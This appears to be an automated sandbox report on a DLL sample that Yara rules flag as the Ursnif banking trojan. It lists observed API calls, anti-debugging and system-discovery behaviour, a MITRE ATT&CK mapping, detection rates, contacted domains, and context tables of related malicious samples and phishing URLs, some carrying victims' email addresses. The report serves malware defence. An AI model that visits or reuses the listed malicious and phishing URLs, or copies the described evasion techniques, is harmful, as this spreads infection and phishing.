Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6DDFAFAC RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,

0_2_6DDFAFAC

Source: C:\Windows\System32\loaddll32.exe

0_2_6DDFAFAC

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6DDC1BAC LoadLibraryA,GetProcAddress,

0_2_6DDC1BAC

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DE1E2D8 mov eax, dword ptr fs:[00000030h]	0_2_6DE1E2D8
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DE1E207 mov eax, dword ptr fs:[00000030h]	0_2_6DE1E207
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DE1DE0E push dword ptr fs:[00000030h]	0_2_6DE1DE0E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6DE1E2D8 mov eax, dword ptr fs:[00000030h]	3_2_6DE1E2D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6DE1E207 mov eax, dword ptr fs:[00000030h]	3_2_6DE1E207
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6DE1DE0E push dword ptr fs:[00000030h]	3_2_6DE1DE0E

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6DDF3484 GetProcessHeap,

0_2_6DDF3484

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6DDEFEBA SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6DDEFEBA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_6DDEFEBA SetUnhandledExceptionFilter,UnhandledExceptionFilter,		3_2_6DDEFEBA

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\5.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.496085670.0000000001330000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.497582493.0000000002E20000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.496085670.0000000001330000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.497582493.0000000002E20000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.496085670.0000000001330000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.497582493.0000000002E20000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: loaddll32.exe, 00000000.00000002.496085670.0000000001330000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.497582493.0000000002E20000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: loaddll32.exe, 00000000.00000002.496085670.0000000001330000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.497582493.0000000002E20000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02A79135 cpuid

3_2_02A79135

Source: C:\Windows\System32\loaddll32.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	0_2_6DDFEC14
Source: C:\Windows\System32\loaddll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	0_2_6DDF2C5A
Source: C:\Windows\System32\loaddll32.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	0_2_6DDFF468
Source: C:\Windows\System32\loaddll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	0_2_6DDFEF45
Source: C:\Windows\System32\loaddll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	0_2_6DDFEEC8
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6DDFEE88
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6DDF29A0
Source: C:\Windows\System32\loaddll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,	0_2_6DDEE036
Source: C:\Windows\System32\loaddll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_6DDFAB64
Source: C:\Windows\System32\loaddll32.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_6DDFF2E7
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6DDF2A26
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	3_2_6DDF2C5A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	3_2_6DDFEC14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_6DDFD10F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	3_2_6DDFF468
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	3_2_6DDFEFC8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	3_2_6DDFEF45
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	3_2_6DDFEEC8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6DDFEE88
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	3_2_6DDFF1BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	3_2_6DDF29A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,	3_2_6DDEE036
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	3_2_6DDFF394
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_6DDFAB64
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	3_2_6DDFCB0D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_6DDFF2E7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	3_2_6DDF2A26

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6DDC1ADA GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_6DDC1ADA

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_02A79135 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

3_2_02A79135

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6DDC1F0E CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_6DDC1F0E

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.451946137.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.452051043.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.496928044.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445570350.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.452023874.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.452000205.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445487547.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445636875.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445602533.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445524931.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451869538.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.452038744.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498068878.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445456909.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451977445.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451921011.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445424230.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445650161.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 452, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 2248, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000003.00000003.451946137.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.452051043.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.496928044.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445570350.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.452023874.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.452000205.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445487547.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445636875.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445602533.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445524931.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451869538.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.452038744.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.498068878.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445456909.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451977445.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.451921011.0000000004D18000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445424230.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.445650161.0000000003328000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 452, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 2248, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	Path Interception	Process Injection12	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Query Registry1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Security Software Discovery3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information21	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Rundll321	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery23	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
5.dll	22%	Virustotal		Browse
5.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.loaddll32.exe.c30000.0.unpack	100%	Avira	HEUR/AGEN.1108168		Download File
3.2.rundll32.exe.2a70000.1.unpack	100%	Avira	HEUR/AGEN.1108168		Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
outlook.com	40.97.116.82	true	false	high
HHN-efz.ms-acdc.office.com	40.101.137.98	true	false	high
FRA-efz.ms-acdc.office.com	52.97.152.210	true	false	high
www.outlook.com	unknown	unknown	false	high
outlook.office365.com	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://outlook.office365.com/grower/GwIQZ7VTU_2B0dEDGXi3usO/98Jy_2Fhjs/9ADdwnOA_2BxxHdxk/bJ6tUkE3rK	~DF3A99C7AD2702480D.TMP.24.dr, {BD6AF35E-DF4A-11EB-90E5-ECF4BB570DC9}.dat.24.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
40.101.137.98	HHN-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
52.97.152.210	FRA-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
52.97.144.2	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
52.97.233.2	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
40.97.116.82	outlook.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	445164
Start date:	07.07.2021
Start time:	10:40:23
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	5.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal84.troj.winDLL@18/7@6/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 13.4% (good quality ratio 12.6%) Quality average: 78.7% Quality standard deviation: 29.5%
HCA Information:	Successful, ratio: 69% Number of executed functions: 55 Number of non-executed functions: 80
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, conhost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 13.88.21.125, 168.61.161.212, 131.253.33.200, 13.107.22.200, 92.122.145.220, 13.64.90.137, 52.255.188.83, 13.107.5.88, 13.107.43.23, 23.35.236.56, 40.88.32.150, 20.82.210.154, 23.203.80.193, 23.216.77.209, 152.199.19.161 Excluded domains from analysis (whitelisted): client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, config-edge-skype.l-0014.l-msedge.net, l-0014.config.skype.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, go.microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, l-0014.dc-msedge.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, afdo-tas-offload.trafficmanager.net, fs.microsoft.com, ie9comview.vo.msecnd.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, dual-a-0001.dc-msedge.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus15.cloudapp.net, cs9.wpc.v0cdn.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:42:35	API Interceptor	1x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
52.97.152.210	https://r0qp15r0b1rq05rrpbqbrpq5.s3-eu-west-1.amazonaws.com/Ap3dX.html#orderadmin@roku.com	Get hash	malicious	Browse
	loader.exe	Get hash	malicious	Browse
	https:\\bit.ly/2WRZ0S5#joyce.chay@milliken.com	Get hash	malicious	Browse
	https://learn4fun.cz/domains/learn4fun.cz/ahgf36894we894jsd/voicemessage/	Get hash	malicious	Browse
52.97.144.2	E848.tmp.exe	Get hash	malicious	Browse
	0G2gue8shl.exe	Get hash	malicious	Browse
	shipping_doc.exe	Get hash	malicious	Browse
	https://immense-bullfrog.10web.me/	Get hash	malicious	Browse
	https://projectcheckg.web.app/#taxes@abrholdings.com	Get hash	malicious	Browse
	ze99HWZnJK.exe	Get hash	malicious	Browse
	https://app.upthere.com/elnino/assets/pdfjs/viewer/ce6fefe64453f27791ffdf3afa5bbdadb5d75d7267b297b30b776a371de64e63/45b49d4fce909afc27225208cd0205c692535fc89a07ab840bb78533e2925460?view_id=e28c4043fb3f3e666cddd8b96543302e5bac6c21c762fba5b895a91a251f9b48&branch_id=52a27d4473c90b9b6d624d662ab8a832c97a3c384a2b776927ed4eccc24a1e0a?*35354689209358HvT35W1Sh3509mW81735BbW098QdbK09W1Sh	Get hash	malicious	Browse
	https://bradyblocks.com/fob/Pro/onedauth/office/index.php	Get hash	malicious	Browse
	https://u10269907.ct.sendgrid.net/wf/click?upn=7TnevfDNdxZp2Q3ysQ7X3oESB0-2FDPAHHGrCSuhANFl0RiIaXTQqc14zMc-2FpX9M8w_fxDop4UK-2FXWtvz-2Fo4SgBilCRDsINTKa-2BV6WoX7TCamBzN4Y3OFVxfYIFnMjo2oF0yanJFKyei-2FKbXVFZy2wWdw2BISVfQ0uuj040ducQ3e4x0ReqX-2BeavUyA3qBOBoptIxux6KHZnY0imx8tUJ6aPUBf7V4AQsKN3qI-2FJUs5ka5TGYo3JtEVvh56ieL-2BftMts8GVieoN5pgiQgMOSfl-2FS3as8UhjMRUwml-2Btsxw6bkw-3D	Get hash	malicious	Browse
52.97.233.2	https://deatee00.z13.web.core.windows.net/#guyb@thomas.co	Get hash	malicious	Browse
40.97.116.82	2790000.dll	Get hash	malicious	Browse
	2770174.dll	Get hash	malicious	Browse
	60e40fb428612.dll	Get hash	malicious	Browse
	zHUScMPOlZ.dll	Get hash	malicious	Browse
	nT5pUwoJSS.dll	Get hash	malicious	Browse
	.exe	Get hash	malicious	Browse
	82attachmen.exe	Get hash	malicious	Browse
	62lette.exe	Get hash	malicious	Browse
	5transcrip.exe	Get hash	malicious	Browse
	1message.exe	Get hash	malicious	Browse
	49instructio.exe	Get hash	malicious	Browse
	.exe	Get hash	malicious	Browse
	52DOCUMEN.exe	Get hash	malicious	Browse
	25messag.exe	Get hash	malicious	Browse
	fuck.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HHN-efz.ms-acdc.office.com	PreOrder.exe	Get hash	malicious	Browse	52.97.201.2
	2790000.dll	Get hash	malicious	Browse	52.97.201.50
	2770174.dll	Get hash	malicious	Browse	52.98.175.18
	60e40fb428612.dll	Get hash	malicious	Browse	52.97.201.18
	zHUScMPOlZ.dll	Get hash	malicious	Browse	40.101.136.242
	SwiftDocument.HTML	Get hash	malicious	Browse	40.101.136.18
	Xerox scan.html	Get hash	malicious	Browse	52.98.151.226
	r.dll	Get hash	malicious	Browse	40.101.137.2
	a9FUs89dWy.dll	Get hash	malicious	Browse	52.98.171.226
	60b49bdd63509.dll	Get hash	malicious	Browse	40.101.137.50
	nT5pUwoJSS.dll	Get hash	malicious	Browse	52.97.201.34
	nT5pUwoJSS.dll	Get hash	malicious	Browse	52.97.233.66
	kZcCqvNtWa.dll	Get hash	malicious	Browse	52.98.171.226
	A5uTdwOwJ1.dll	Get hash	malicious	Browse	40.101.138.210
	FuiZSHt8Hx.dll	Get hash	malicious	Browse	52.98.151.242
	609a460e94791.tiff.dll	Get hash	malicious	Browse	52.97.201.34
	iJdlvBxhYu.dll	Get hash	malicious	Browse	52.97.150.2
	8OKQ6ogGRx.dll	Get hash	malicious	Browse	40.101.138.2
	609110f2d14a6.dll	Get hash	malicious	Browse	40.101.137.34
	New%20order%20contract.html	Get hash	malicious	Browse	52.98.175.2
outlook.com	oEE058tCoG.exe	Get hash	malicious	Browse	40.93.207.1
	2Bmv1UZL2m.exe	Get hash	malicious	Browse	52.101.24.0
	oS4iWYYsx7.exe	Get hash	malicious	Browse	104.47.53.36
	P4SRvI1baM.exe	Get hash	malicious	Browse	104.47.54.36
	051y0i7M8q.exe	Get hash	malicious	Browse	40.93.207.0
	lEbR9gFgLr.exe	Get hash	malicious	Browse	104.47.54.36
	0OvBoFRzgC.exe	Get hash	malicious	Browse	104.47.54.36
	A1qhcbngFV.exe	Get hash	malicious	Browse	104.47.54.36

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
